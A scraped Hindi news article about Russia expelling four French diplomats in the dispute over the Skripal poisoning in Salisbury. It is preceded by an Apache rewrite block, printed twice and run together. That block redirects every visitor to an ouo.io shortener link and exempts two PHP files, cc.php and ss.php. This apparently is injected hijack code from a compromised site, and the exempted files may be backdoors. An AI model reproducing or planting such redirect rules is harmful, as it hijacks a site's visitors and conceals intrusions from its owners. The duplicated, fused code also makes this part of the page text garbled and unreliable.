
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 706
Previous Nextनई दिल्ली। ब्रिटेन में पूर्व जासूस को जहर देने के मामले में अमेरिका के बाद अब रूस ने फ्रांस को तगड़ा झटका दिया है। रूस ने फ्रांस के 4 राजनयिकों को निष्कासित कर दिया है। बताया जा रहा है कि फ्रांस द्वारा अपने राजनयिकों को निकाले जाने के बाद रूस की यह जवाबी कार्रवाई है।
दरअसल, फ्रांस ने भी रूस के 4 राजनयिकों को निकाला था। फ्रांसीसी विदेश मंत्रालय ने एक बयान में कहा कि हम मॉस्को के कदम पर सिर्फ खेद जता सकते हैं। रूस ने यह कार्रवाई यूनाइटेड किंगडम में एक पूर्व जासूस के जहरखुरानी की घटना के बाद उसके राजनयिकों को निष्कासित किए जाने को लेकर बदले की प्रतिक्रिया में की है। बयान में कहा गया है कि इंग्लैंड के सेलिस्बरी में रूस के पूर्व जासूस सर्जेई स्क्रिपल और उनकी बेटी यूलिया को जहर देने के मामले में रूस ने अबतक अपेक्षित स्पष्टीकरण देने से इनकार किया है। गौर हो कि एक दिन पहले रूस ने अमेरिका के 60 राजनयिकों को देश से बाहर निकाला था, जिनमें से 58 मास्को में अमेरिकी मिशन से जुड़े थे और दो येकेतरिनबर्ग के थे। उन्हें कूटनीतिक दर्जे के अनुरूप अनुचित गतिविधियों के लिए निष्कासित किया गया। रूस ने सेंट पीटर्सबर्ग वाणिज्य दूतावास को भी बंद करने का आदेश दिया था। बता दें कि अब तक 29 देशों ने यूके के साथ एकजुटता दिखाते हुए 145 रूसी अधिकारियों को निष्कासित किया है। नाटो ने भी बेल्जियम में अपने मिशन से 10 रूसियों को बाहर करने का आदेश दिया है।